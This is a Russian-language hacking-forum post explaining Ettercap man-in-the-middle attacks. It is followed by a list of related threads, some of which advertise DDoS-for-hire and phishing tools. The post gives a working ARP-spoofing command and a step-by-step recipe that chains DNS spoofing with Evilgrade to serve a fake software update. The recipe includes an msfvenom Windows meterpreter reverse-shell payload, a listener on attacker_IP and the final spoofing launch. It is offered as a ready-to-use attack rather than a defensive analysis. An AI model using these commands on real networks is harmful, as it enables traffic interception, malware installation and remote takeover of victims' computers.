«Атаки класса man-in- the-middle с помощью Ettercap, »

B

Bad-Dag

Original poster
Здравствуйте, в этой статье мы познакомимся с такими инструментом как: Ettercap,

Ettercap – сниффер и не только

Еttercap — инструмент для анализа безопасности компьютерной сети, обладающий большим количеством
разнообразных возможностей, но ставший особо популярным за умение выполнять атаку ARP-spoofing.

Так же, умеет анализировать трафик и извлекать пароли различных протоколов - от http и ftp до imap и nfs.
Может работать в трех режимах — консольном/текстовом (-T), псевдографике/ncurses (-C) или в графическом
варианте (-G).


Пример проведения атаки типа ARP spoofing c использованием Ettercap:


ettercap -T -q -M arp:remote -L log /IP_gateway/ /IP_windowsClient/


DNS Spoofing с использованием Ettercap и дальнейшая эксплуатация жертвы с помощью фреймворка Evilgrade


1) Вначале необходимо проверить и внести правки в файл выбранного модуля Evilgrade
nano /usr/share/isr-evilgrade/modules/notepadplus.pm


2) Добавить необходимую A-запись в модуль Ettercap, отвечающий за атаку типа dns spoofing
nano /etc/ettercap/etter.dns


3) Создать пейлоад, используя возможности фреймворка metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_IP LPORT=8765 -f exe > /tmp/agent.exe


4) Запустить слушатель, готовый принимать подключения от пейлоада
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST attacker_IP;
set LPORT 8765; exploit -j"


5) Сконфигурировать и запустить Evilgrade
evilgrade> configure notepadplus
evilgrade> show options
evilgrade> set agent /tmp/agent.exe
evilgrade> start


6) Последний шаг — запуск атаки dns spoofing с помощью ettercap
ettercap -T -q -M arp:remote -P dns_spoof /IP_gateway// /IP_windowsClient//

Всем спасибо за внимание.
 
Название темы
Автор Заголовок Раздел Ответы Дата
B Атаки класса man-in- the-middle часть 3 с помощью MITMf Уязвимости и взлом 0
B Атаки класса man-in- the-middle часть 2 с помощью Responder Уязвимости и взлом 0
Support81 ИИ-атаки на подъёме: почему 2024 год стал переломным для кибербезопасности Новости в сети 0
Support81 37 команд для атаки: что скрывает новый бэкдор FINALDRAFT Новости в сети 0
Support81 Ковровые бомбардировки в сети: DDoS-атаки выросли на 268% Новости в сети 0
Support81 35 лет программам-вымогателям: от первой атаки до наших дней Новости в сети 0
Support81 Интересно Fileless атаки как смысл жизни: подробный разбор Вирусология 0
Support81 Фишинговая эпидемия Phorpiex возвращается: коллаборация с LockBit сделала атаки ещё опаснее Новости в сети 0
Support81 Градус email-фишинга повышается: TA866 использует новый метод атаки Новости в сети 0
Support81 Запрет на выплаты вымогателям: как отказ от выкупа усилит атаки на критическую инфраструктуру Новости в сети 0
Ёшкин_кот Интересно 20+ хакерских операционных систем для атаки и защиты Полезные статьи 0
L Интересно Хакеры КНДР усилили атаки на биткоин-компании и трейдеров Новости в сети 0
L Интересно В результате атаки на приложение DeFi dForce похищено $25 млн Новости в сети 0
S DDoS-атаки в четвертом квартале 2019 года Новости в сети 0
S Атаки: 800 000 россиян стали жертвами банковского Android-ботнета Новости в сети 1
A Интересно (РЕКОМЕНДУЮ) Заказ DDOS атаки - Услуги по устранению конкуренции. Ищу работу. Предлагаю свои услуги. 3
E Мощнейший спам звонками и SMS + любой вид DDoS-атаки Termux Раздача email 1
Admin Xakep #244. Атаки по сторонним каналам. Полезные статьи 0
Admin Мальтийский банк приостановил работу из-за атаки Новости в сети 0
G Как выполняют DDOS атаки? Spam/DDOS/Malware 9
S Как делать DDos/Dos атаки через VDS сервер Spam/DDOS/Malware 0
Admin Усиливаем ddos атаки с помощью уязвимости в Memcached Полезные статьи 0
Admin Исследователь предложил майнить с помощью Wi-Fi сетей и атаки CoffeeMiner Новости в сети 0
P Проверено досс атаки Спам / Флуд / Ддос 2
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
Admin Строим ханипот и выявляем DDoS-атаки Spam/DDOS/Malware 0
Admin DDoS атаки с Linux серверов Spam/DDOS/Malware 12
farhad.tiger Фейк для целевой атаки на ВК с новым дизайном, "Ваша страница заблокирована" Другое 16
Support81 UNC4841 — настоящие спецагенты или просто хакеры высокого класса? Новости в сети 0
S Заработок для работяг 9 класса Способы заработка 7
S Дешевая активация Инстаграм и других соц.сетей в sms-man.ru Ищу работу. Предлагаю свои услуги. 0
D SMS-MAN.RU - новый сервис для приёма смс Ищу работу. Предлагаю свои услуги. 0
S Sms-man.ru - лучший сервис СМС активаций Свободное общение и флейм 1
АнАлЬнАя ЧуПаКаБрА INLINE Wood-Man.biz Проекты Private Keeper 0
G Skeleton , Blackeye , Phisher-man - Инструменты для фишинговых атак Полезные статьи 0

Название темы